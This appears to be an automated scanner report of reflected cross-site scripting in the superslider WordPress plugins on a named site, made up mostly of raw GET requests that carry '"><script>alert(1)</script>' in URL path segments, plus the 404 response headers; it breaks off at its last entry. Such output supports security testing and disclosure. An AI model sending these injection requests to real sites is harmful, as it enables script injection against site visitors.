This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/js/superslider-menu-min.jsca307"><script>alert(1)</script>082b33d15a1 HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:51 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674571+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674571; expires=Thu, 02-Feb-2012 19:22:51 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:51 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 972b5"><script>alert(1)</script>c3df305ca7c was submitted in the REST URL parameter 1. This input was echoed as 972b5\"><script>alert(1)</script>c3df305ca7c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site972b5"><script>alert(1)</script>c3df305ca7c/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:40 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674561+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674561; expires=Thu, 02-Feb-2012 19:22:41 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:41 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53444
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60b3e"><script>alert(1)</script>54f1bceee82 was submitted in the REST URL parameter 2. This input was echoed as 60b3e\"><script>alert(1)</script>54f1bceee82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content60b3e"><script>alert(1)</script>54f1bceee82/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:42 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674562+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674563; expires=Thu, 02-Feb-2012 19:22:43 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:43 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53443
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e84f7"><script>alert(1)</script>c0fd9f27655 was submitted in the REST URL parameter 3. This input was echoed as e84f7\"><script>alert(1)</script>c0fd9f27655 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/pluginse84f7"><script>alert(1)</script>c0fd9f27655/superslider-menu/plugin-data/superslider/ssMenu/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:44 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674564+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674564; expires=Thu, 02-Feb-2012 19:22:44 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:44 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53443
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b31fa"><script>alert(1)</script>eb994eb117d was submitted in the REST URL parameter 4. This input was echoed as b31fa\"><script>alert(1)</script>eb994eb117d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menub31fa"><script>alert(1)</script>eb994eb117d/plugin-data/superslider/ssMenu/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:45 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674565+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674565; expires=Thu, 02-Feb-2012 19:22:45 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:45 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53443
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3ab5"><script>alert(1)</script>b3f3e43ffe4 was submitted in the REST URL parameter 5. This input was echoed as b3ab5\"><script>alert(1)</script>b3f3e43ffe4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/plugin-datab3ab5"><script>alert(1)</script>b3f3e43ffe4/superslider/ssMenu/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:47 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674567+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674567; expires=Thu, 02-Feb-2012 19:22:47 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:48 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53442
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a4e7"><script>alert(1)</script>bc1d9122022 was submitted in the REST URL parameter 6. This input was echoed as 8a4e7\"><script>alert(1)</script>bc1d9122022 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/plugin-data/superslider8a4e7"><script>alert(1)</script>bc1d9122022/ssMenu/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:49 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674569+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674569; expires=Thu, 02-Feb-2012 19:22:49 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:49 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53443
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93e26"><script>alert(1)</script>3ef7b7b12e4 was submitted in the REST URL parameter 7. This input was echoed as 93e26\"><script>alert(1)</script>3ef7b7b12e4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu93e26"><script>alert(1)</script>3ef7b7b12e4/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:50 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674570+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674571; expires=Thu, 02-Feb-2012 19:22:51 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:51 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53443
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e93d9"><script>alert(1)</script>b1176fcac2 was submitted in the REST URL parameter 8. This input was echoed as e93d9\"><script>alert(1)</script>b1176fcac2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/defaulte93d9"><script>alert(1)</script>b1176fcac2/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:52 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674572+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674573; expires=Thu, 02-Feb-2012 19:22:53 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:53 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d43c"><script>alert(1)</script>997d41182e2 was submitted in the REST URL parameter 9. This input was echoed as 5d43c\"><script>alert(1)</script>997d41182e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css5d43c"><script>alert(1)</script>997d41182e2 HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:54 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674575+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674575; expires=Thu, 02-Feb-2012 19:22:55 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:55 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53443
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b259"><script>alert(1)</script>cf11bf0924a was submitted in the REST URL parameter 1. This input was echoed as 7b259\"><script>alert(1)</script>cf11bf0924a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site7b259"><script>alert(1)</script>cf11bf0924a/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:00 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674580+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674580; expires=Thu, 02-Feb-2012 19:23:00 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:00 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53395
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b83ff"><script>alert(1)</script>15d9ca5fa65 was submitted in the REST URL parameter 2. This input was echoed as b83ff\"><script>alert(1)</script>15d9ca5fa65 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-contentb83ff"><script>alert(1)</script>15d9ca5fa65/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:01 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674581+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674582; expires=Thu, 02-Feb-2012 19:23:02 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:02 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53394
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30690"><script>alert(1)</script>04ae898bca was submitted in the REST URL parameter 3. This input was echoed as 30690\"><script>alert(1)</script>04ae898bca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins30690"><script>alert(1)</script>04ae898bca/superslider-postsincat/js/mootools-1.2.3-core-yc.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:03 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674583+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53392
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86e0b"><script>alert(1)</script>4f3b7f24e7a was submitted in the REST URL parameter 4. This input was echoed as 86e0b\"><script>alert(1)</script>4f3b7f24e7a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat86e0b"><script>alert(1)</script>4f3b7f24e7a/js/mootools-1.2.3-core-yc.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:04 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674584+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53395
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45505"><script>alert(1)</script>a19c334793e was submitted in the REST URL parameter 5. This input was echoed as 45505\"><script>alert(1)</script>a19c334793e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/js45505"><script>alert(1)</script>a19c334793e/mootools-1.2.3-core-yc.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
